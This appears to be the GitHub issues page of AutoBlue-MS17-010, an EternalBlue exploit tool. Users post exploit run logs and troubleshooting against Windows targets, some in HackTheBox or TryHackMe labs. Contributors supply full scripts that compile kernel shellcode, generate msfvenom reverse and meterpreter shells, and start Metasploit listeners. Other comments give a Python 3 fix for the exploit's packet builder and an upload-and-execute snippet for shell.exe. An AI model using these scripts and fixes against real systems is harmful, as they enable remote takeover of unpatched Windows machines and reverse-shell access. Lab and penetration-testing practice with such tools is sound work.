3ndg4me / autoblue-ms17-010

This is just a semi-automated, fully working, no-bs, non-Metasploit version of the public exploit code for MS17-010

License: MIT License

Python 76.31% Shell 4.02% Assembly 19.66%
eternal-blue-exploits security hacking hacktoberfest python

autoblue-ms17-010's People

Contributors: 3ndg4me, adrianvollmer, apprentice, aysebilgegunduz, deus-ex-silicium, diamondo25, dkarpo, iamcarron, ljrk0

autoblue-ms17-010's Issues

Syntax error: "(" unexpected (expecting "then")

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
./shell_prep.sh: 18: ./shell_prep.sh: Syntax error: "(" unexpected (expecting "then")

Script keeps timing out

I am running this against Blue on HTB. I keep getting the following error. I am able to ping the host. I have tried restarting the machine multiple times. I am on kali 2021.3-vmware-amd64.

 python3 eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2205
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 984, in non_polling_read
    received = self._sock.recv(bytes_left)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/root/hackthebox/blue/AutoBlue-MS17-010/eternalblue_exploit7.py", line 563, in <module>
    exploit(TARGET, sc, numGroomConn)
  File "/root/hackthebox/blue/AutoBlue-MS17-010/eternalblue_exploit7.py", line 544, in exploit
    conn.disconnect_tree(tid)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/smb.py", line 2886, in disconnect_tree
    self.recvSMB()
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/smb.py", line 2592, in recvSMB
    r = self._sess.recv_packet(self.__timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 915, in recv_packet
    data = self.__read(timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 1002, in __read
    data = self.read_function(4, timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 986, in non_polling_read
    raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.

How to generate bind shell.

I'm sorry if this post is not appropriate as an issue. I can't find any sources on how to use this tool to generate a bind shell instead of a reverse shell.

FileNotFoundError: [Errno 2] No such file or directory: 'reverse_shell.bin'

Thanks for your click.

Attacker: Kali 2021
Target: Windows Server 2012 R2

When I compile:
python eternalblue_exploit8.py (windows server 2012 r2 's ip) reverse_shell.bin 500
Traceback (most recent call last):
File "/home/kali/desktop/eternalblue_exploit8.py", line 542, in
fp = open(sys.argv[2], 'rb')
^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: 'reverse_shell.bin'

How do I solve it?

I use a translator and my English is poor, please forgive me if there are some errors.

STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

Any thoughts on why running python zzz_exploit.py x.x.x.x turns out like this?

[*] Target OS: Windows 5.1
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x8171e930
SESSION: 0xe11493f0
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe1d8c030
Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!
RestrictedSids: 0xe1d60c30
RestrictedSidCount: 0x1f4
userAndGroupCount: 0x4c
userAndGroupsAddr: 0xe1d8c0b8
Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1d8c0b8
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[-] got exception
CRITICAL:root:SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Done

syntax error in line 567, mysmb.py

I am learning to exploit without Metasploit. I came across AutoBlue when attempting to do so on HTB Blue.

When I run python eternal_checker.py I get errors

Line 427 in mysmb.py:

except Exception as e:

Line 567 in mysmb.py

except Exception, e:

I am stuck on how best to use it, py2 or py3. I tried using py2 and

  1. eternal_checker.py ran but it didn't list out named pipes
  2. didn't get active session in msf5 after python eternalblue_exploit7.py [IP:XX:XX:XX] shellcode/sc_all.bin

Help please

exploit/multi/handler not working without setting pipe

HTB Blue box https://app.hackthebox.eu/machines/Blue

Computer        : HARIS-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows

I need to run use auxiliary/scanner/smb/pipe_auditor before using multi/handler.
Also, it might be the reason why non-meterpreter shells are not working, because there is no pipe set.

No route to host

After doing every step perfectly, I come up with this error: "No route to host". What is the solution for this?

Python3 related issue.

My Kali Release: 2021.1

when I run the command, I got the error message below:

┌──(kali㉿kali)-[~/blue]
└─$ python3 ./eternalblue_exploit10.py 10.10.10.40 ./shellcode/sc_all.bin
Traceback (most recent call last):
File "/home/kali/blue/./eternalblue_exploit10.py", line 74, in
ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x260 # with these fea, ntfea size is 0x1c80
TypeError: can't concat str to byt

I have run the command line below before running it.

┌──(kali㉿kali)-[~/blue]
└─$ pip install -r requirements.txt
Requirement already satisfied: impacket in /usr/local/lib/python3.9/dist-packages/impacket-0.9.23-py3.9.egg (from -r requirements.txt (line 1)) (0.9.23)
Requirement already satisfied: chardet in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (4.0.0)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.1.2)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.18.2)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.9.3)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (20.0.1)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.9.7)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.15.0)

I thought it was related to a Python version issue, but I don't know how to fix it. As you mentioned it supports Python 3, would you please have a look? I am new to Python :(

Not working INVALID_PARAMETER

Hi
I have tested it on vulnerable Windows 7 and Windows 2008 none of them worked:

SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

no shell back in msf

Exploit completes but returns non functional shell

Hi,

I'm having some issues with this code.
I tried using it and it does connect back to my attacking box, however there is no shell (cmd.exe).
I was expecting something like this:

C:\Windows\system32>

I tried it against several machines, mostly Windows 7 & Server 2008 which I knew to be vulnerable.
I even tried inputting a different numGroomConn number but with no visible results.
Any thoughts?

python eternalblue_checker.py 10.x.x.x
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_OBJECT_NAME_NOT_FOUND

python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.x.x.x.
Ncat: Connection from 10.x.x.x:49179.

python eternalblue_checker.py 10.x.x.x
Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: Ok (64 bit)
netlogon: Ok (64 bit)
lsarpc: Ok (64 bit)
browser: STATUS_ACCESS_DENIED

python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.x.x.x] 49218

python eternalblue_checker.py 10.x.x.x
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

nc -nlvp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.x.x.x.
Ncat: Connection from 10.x.x.x:49157.

Fix?

python eternalblue_checker.py xxx.xxx.xxx.xxx
Target OS: Traceback (most recent call last):
  File "eternalblue_checker.py", line 42, in <module>
    conn.login(USERNAME, PASSWORD)
  File "/root/AutoBlue-MS17-010/mysmb.py", line 152, in login
    smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
TypeError: login() takes at most 6 arguments (7 given)

How to use it on Win7?

I am trying to use the exploit on my Win7 PC. I don't know how to set it up. Which version of Python should I use? Thanks

./shell_prep.sh: 18: ./shell_prep.sh: Syntax error: "(" unexpected (expecting "then")

./shell_prep.sh
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
./shell_prep.sh: 18: ./shell_prep.sh: Syntax error: "(" unexpected (expecting "then")

BindFailed.

Got this error, tried on many different ports still same issue.
Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444)

I have no issues using Metasploit (ms17_010_eternalblue) alone to perform the same type of attack. This works.

eternalblue_exploit7.py - INVALID_PARAMETER

I've confirmed the target is vulnerable (blue - HTB).

I've created the shellcode without errors.

I've started the listener without errors.

I get the following error when attempting the eternalblue exploit.

root@host/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin 12
shellcode size: 2203
numGroomConn: 12
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

Any suggestions?

Windows 10 crashing after using eternalblue_exploit10.py

From Kali, I am trying to use eternalblue_exploit10.py. I tried on several W10 machines (all not patched according to eternal_checker.py), and after I run the command the W10 VM crashes.

Target machine Microsoft Windows Version 10.0 (Build 10240)

Here's the output of the command in my Kali VM:

python3 eternalblue_exploit10.py 192.168.202.137 shellcode/sc_all.bin
shellcode size: 2307
numGroomConn: 13
Target OS: Windows 10 Home 10240
got good NT Trans response
got good NT Trans response
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status for nx: INVALID_PARAMETER
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 984, in non_polling_read
received = self._sock.recv(bytes_left)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
TimeoutError: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/EternalBlue/AutoBlue-MS17-010/eternalblue_exploit10.py", line 599, in
exploit(TARGET, sc, numGroomConn)
File "/home/kali/EternalBlue/AutoBlue-MS17-010/eternalblue_exploit10.py", line 570, in exploit
nxconn.disconnect_tree(tid)
File "/usr/lib/python3/dist-package.py", line 2886, in disconnect_tree
self.recvSMB()
File "/usr/lib/python3/dist-package.py", line 2592, in recvSMB
r = self.sess.recv_packet(self.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 915, in recv_packet
data = self.__read(timeout)
^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 1002, in __read
data = self.read_function(4, time
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 986, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETB with the remote host timed out.

Fix for listener_prep.sh

Script Enhancements for Improved Portability and Readability 🔧

I made the following changes to improve portability, readability, and organization:

  1. Replaced Double Square Brackets with Single Square Brackets:

    • Replaced [[ ... ]] with [ ... ] to ensure compatibility with various shell interpreters.
  2. Simplified Nested If Statements:

    • Simplified nested if statements for better readability and clarity.
  3. Used -p Option with read Command:

    • Utilized the -p option with the read command to display a prompt message directly on the same line. 💻
  4. Consolidated Common Code:

    • Consolidated common code blocks to avoid repetition and improve maintainability.

#!/bin/bash
cat << "EOF"
  __
  /,-
  ||)
  \\_, )
   `--'
EOF
echo Eternal Blue Metasploit Listener
echo
echo LHOST for reverse connection:
read ip
echo LPORT for x64 reverse connection:
read portOne
echo LPORT for x86 reverse connection:
read portTwo
echo Enter 0 for meterpreter shell or 1 for regular cmd shell:
read cmd

# Changes made for better portability and clarity
if [ "$cmd" -eq 0 ]; then
    read -p "Type 0 if this is a staged payload or 1 if it is for a stageless payload: " staged
    if [ "$staged" -eq 0 ]; then
        echo "Starting listener (staged)..."
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    elif [ "$staged" -eq 1 ]; then
        echo "Starting listener (stageless)..."
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/meterpreter_reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        # stageless x86 payload, matching the stageless x64 handler above
        echo "set PAYLOAD windows/meterpreter_reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    fi
elif [ "$cmd" -eq 1 ]; then
    read -p "Type 0 if this is a staged payload or 1 if it is for a stageless payload: " staged
    if [ "$staged" -eq 0 ]; then
        echo "Starting listener (staged)..."
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/shell/reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        echo "set PAYLOAD windows/shell/reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    elif [ "$staged" -eq 1 ]; then
        echo "Starting listener (stageless)..."
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/shell_reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        # stageless x86 payload, matching the stageless x64 handler above
        echo "set PAYLOAD windows/shell_reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    fi
else
    echo "Invalid option...exiting..."
fi

eternalblue_checker.py error

python eternalblue_checker.py 96.126..
[*] exec: python eternalblue_checker.py 96.126..*

Traceback (most recent call last):
File "eternalblue_checker.py", line 42, in
conn.login(USERNAME, PASSWORD)
File "/root/autoblue/mysmb.py", line 152, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3340, in login
self.login_extended(user, password, domain, lmhash, nthash, use_ntlmv2 = True)
File "/root/autoblue/mysmb.py", line 160, in login_extended
Target OS:
smb.SMB.login_extended(self, user, password, domain, lmhash, nthash, use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3250, in login_extended
type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, respToken['ResponseToken'], user, password, domain, lmhash, nthash, use_ntlmv2 = use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 618, in getNTLMSSPType3
ntResponse, lmResponse, sessionBaseKey = computeResponse(ntlmChallenge['flags'], ntlmChallenge['challenge'], clientChallenge, serverName, domain, user, password, lmhash, nthash, use_ntlmv2 )
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 36, in computeResponse
lmhash, nthash, use_ntlmv2=use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 899, in computeResponseNTLMv2
av_pairs = AV_PAIRS(serverName)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 206, in __init__
self.fromString(data)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 229, in fromString
fType = struct.unpack('<H',tInfo[:struct.calcsize('<H')]

Help!!!!!!

ImportError: No module named impacket

python eternal_checker.py 192.168.0.102
Traceback (most recent call last):
File "eternal_checker.py", line 1, in
from mysmb import MYSMB
File "/home/kali/soft/AutoBlue-MS17-010/mysmb.py", line 3, in
from impacket import smb, smbconnection
ImportError: No module named impacket

Please help me. I have run: pip install impacket, but it is not working.

I always get this problem when I try to run eternal_checker.py ip

root@kali:/AutoBlue-MS17-010# python eternal_checker.py 192.168.0.101
Traceback (most recent call last):
File "eternal_checker.py", line 89, in
main()
File "eternal_checker.py", line 66, in main
conn = MYSMB(options.target_ip, int(options.port))
File "/AutoBlue-MS17-010/mysmb.py", line 122, in __init__
smb.SMB.__init__(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2437, in __init__
self.neg_session()
File "/AutoBlue-MS17-010/mysmb.py", line 178, in neg_session
smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2657, in neg_session
smb = self.recvSMB()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2521, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 997, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 983, in non_polling_read
raise NetBIOSError('Error occurs while reading from remote', ERRCLASS_OS, ex[0])
impacket.nmb.NetBIOSError: Error occurs while reading from remote(104)


TypeError: can't concat str to bytes on Python 3.9.7, latest impacket, clean Miniconda docker environment

Hello,

I am having an issue with the Relevant CTF (https://tryhackme.com/room/relevant) using AutoBlue. I see some walkthroughs using it successfully - so the command should work.

As requested, I have filed this as a new issue, as this indeed does occur in latest impacket, latest Python, in a clean Miniconda docker environment (as well as on my host, Kali Linux 2021.1).

The following steps will reproduce this issue:

docker run -i -t continuumio/miniconda3 /bin/bash
conda create -n py397 python=3.9.7
conda activate py397
pip install git+https://github.com/SecureAuthCorp/impacket
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
python3 zzz_exploit.py 'RELEVANT/Bill:[email protected]'

Yielding the following results:

[*] Target OS: Windows Server 2016 Standard Evaluation 14393
[-] Could not open /usr/share/metasploit-framework/data/wordlists/named_pipes.txt, trying hardcoded values
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Traceback (most recent call last):
  File "/AutoBlue-MS17-010/zzz_exploit.py", line 1112, in <module>
    main()
  File "/AutoBlue-MS17-010/zzz_exploit.py", line 1109, in main
    exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
  File "/AutoBlue-MS17-010/zzz_exploit.py", line 980, in exploit
    if not info['method'](conn, pipe_name, info):
  File "/AutoBlue-MS17-010/zzz_exploit.py", line 469, in exploit_matched_pairs
    info.update(leak_frag_size(conn, tid, fid))
  File "/AutoBlue-MS17-010/zzz_exploit.py", line 313, in leak_frag_size
    req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
  File "/AutoBlue-MS17-010/mysmb.py", line 375, in create_nt_trans_packet
    _put_trans_data(transCmd, param, data, noPad)
  File "/AutoBlue-MS17-010/mysmb.py", line 83, in _put_trans_data
    transData += (b'\x00' * padLen) + data
TypeError: can't concat str to bytes

Thank you for your time.
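The "can't concat str to bytes" tracebacks on this page (the ntfea9000 line in eternalblue_exploit10.py and _put_trans_data in mysmb.py) have one cause: Python 2 code that concatenates str literals such as 'A'*0x10d0 or '\x00' with the bytes that struct.pack() returns. The block below is an added example, not the project's own code, showing the normalisation that fixes it; the transaction body layout and the function names are assumptions for illustration, not mysmb.py's exact code.

```python
import struct


def to_bytes(value):
    """Return value as bytes.

    The Python 2 exploit sources mix str literals ('A' * 0x10d0, '\\x00') with
    struct.pack() output.  Under Python 3 those are str and bytes, and "+"
    between them raises "can't concat str to bytes".  Latin-1 maps the code
    points 0..255 one-to-one onto byte values, so single-byte escapes keep
    their numeric meaning after encoding.
    """
    if isinstance(value, (bytes, bytearray)):
        return bytes(value)
    if isinstance(value, str):
        return value.encode("latin-1")
    raise TypeError("expected str or bytes, got %s" % type(value).__name__)


def put_trans_data(param, data, no_pad=False, align=4):
    """Assemble the parameter and data regions of an SMB transaction body.

    Layout used here (an assumption for this example, not mysmb.py's code):
    parameters first, then zero padding so the data region starts on an
    `align`-byte boundary unless no_pad is set, then the data.  Both inputs
    go through to_bytes() first, which is the fix for the TypeError raised
    at mysmb.py line 83 in the post above (data='A'*0x10d0 is a str).

    Returns (body, param_offset, data_offset), offsets relative to body.
    """
    param = to_bytes(param)
    data = to_bytes(data)
    pad_len = 0
    if not no_pad and len(param) % align:
        pad_len = align - (len(param) % align)
    body = param + (b"\x00" * pad_len) + data
    return body, 0, len(param) + pad_len


def build_ntfea_list(count=0x260):
    """Python 3 form of the line that fails in eternalblue_exploit10.py:

        (pack('<BBH', 0, 0, 0) + '\\x00') * 0x260

    The only change needed is the bytes literal b'\\x00'.  Each entry is the
    4-byte SMB_FEA header (flag, name length, value length) followed by the
    NUL that terminates the empty name, 5 bytes in total.
    """
    entry = struct.pack("<BBH", 0, 0, 0) + b"\x00"
    return entry * count


if __name__ == "__main__":
    body, poff, doff = put_trans_data(struct.pack("<HH", 5, 0), "A" * 0x10d0)
    print("trans body: %d bytes, data at offset %d" % (len(body), doff))
    print("ntfea list: %d bytes" % len(build_ntfea_list()))
```

Applied to the repository, the same change is mechanical: every str literal that ends up next to struct.pack() output becomes a bytes literal, and any data argument that can still arrive as str is passed through a to_bytes() style helper at the packet builder's entry point rather than at each call site.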

zzz_exploit.py - enable smb copy of file and execute.

I would like to enable this in the file instead of the shell
smbConn = conn.get_smbconnection()
smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe')
service_exec(conn, r'c:\test.exe')

Is this possible because I am testing with a WinXP host and scripts do not work against that machine.

Fix for shell_prep.sh

Changes for Improved Portability and Compatibility ⚙️

Several modifications have been implemented to enhance portability and resolve compatibility issues associated with the use of double brackets [[ ... ]].

Main Differences:

  • Compatibility with Different Shell Interpreters: Replaced double brackets [[ ... ]] with single brackets [ ... ] to ensure compatibility with various shell interpreters.

  • Code Simplification: Streamlined certain sections of the code to enhance readability and organization.

  • Usage of -p with the read Command: Employed the -p option with the read command to display a prompt message directly on the same line. 💻

#!/bin/bash
set -e
cat << "EOF"
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
EOF
echo Eternal Blue Windows Shellcode Compiler
echo
echo Let\'s compile them windoos shellcodezzz
echo
echo Compiling x64 kernel shellcode
nasm -f bin eternalblue_kshellcode_x64.asm -o sc_x64_kernel.bin
echo 'Compiling x86 kernel shellcode'
nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin
echo kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? \(Y\/n\)
read genMSF

if [ "$genMSF" = "y" ] || [ "$genMSF" = "Y" ]; then
    read -p "LHOST for reverse connection: " ip
    read -p "LPORT you want x64 to listen on: " portOne
    read -p "LPORT you want x86 to listen on: " portTwo

    read -p "Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell: " cmd

    if [ "$cmd" -eq 0 ]; then
        read -p "Type 0 to generate a staged payload or 1 to generate a stageless payload: " staged
        if [ "$staged" -eq 0 ]; then
            echo "Generating x64 and x86 meterpreter shells (staged)..."
            msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST="$ip" LPORT="$portOne"
            # the merge step below needs sc_x86_msf.bin as well, so generate the x86 payload too
            msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST="$ip" LPORT="$portTwo"
        elif [ "$staged" -eq 1 ]; then
            echo "Generating x64 and x86 meterpreter shells (stageless)..."
            msfvenom -p windows/x64/meterpreter_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST="$ip" LPORT="$portOne"
            msfvenom -p windows/meterpreter_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST="$ip" LPORT="$portTwo"
        else
            echo "Invalid option...exiting..."
            exit 1
        fi
    elif [ "$cmd" -eq 1 ]; then
        read -p "Type 0 to generate a staged payload or 1 to generate a stageless payload: " staged
        if [ "$staged" -eq 0 ]; then
            echo "Generating x64 and x86 cmd shells (staged)..."
            msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST="$ip" LPORT="$portOne"
            msfvenom -p windows/shell/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST="$ip" LPORT="$portTwo"
        elif [ "$staged" -eq 1 ]; then
            echo "Generating x64 and x86 cmd shells (stageless)..."
            msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST="$ip" LPORT="$portOne"
            msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST="$ip" LPORT="$portTwo"
        else
            echo "Invalid option...exiting..."
            exit 1
        fi
    else
        echo "Invalid option...exiting..."
        exit 1
    fi

    echo "MERGING SHELLCODE WOOOO!!!"
    cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
    cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
    python3 eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
else
    echo "Okay cool, make sure you merge your own shellcode properly :)"
fi

echo "DONE"
exit 0

eternal_checker.py error

python eternal_checker.py 10.10.10.178
Traceback (most recent call last):
File "eternal_checker.py", line 89, in
main()
File "eternal_checker.py", line 66, in main
conn = MYSMB(options.target_ip, int(options.port))
File "/home/warmachine/Documentos/HTB/Nest/AutoBlue-MS17-010/mysmb.py", line 122, in __init__
smb.SMB.__init__(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2427, in __init__
self.neg_session()
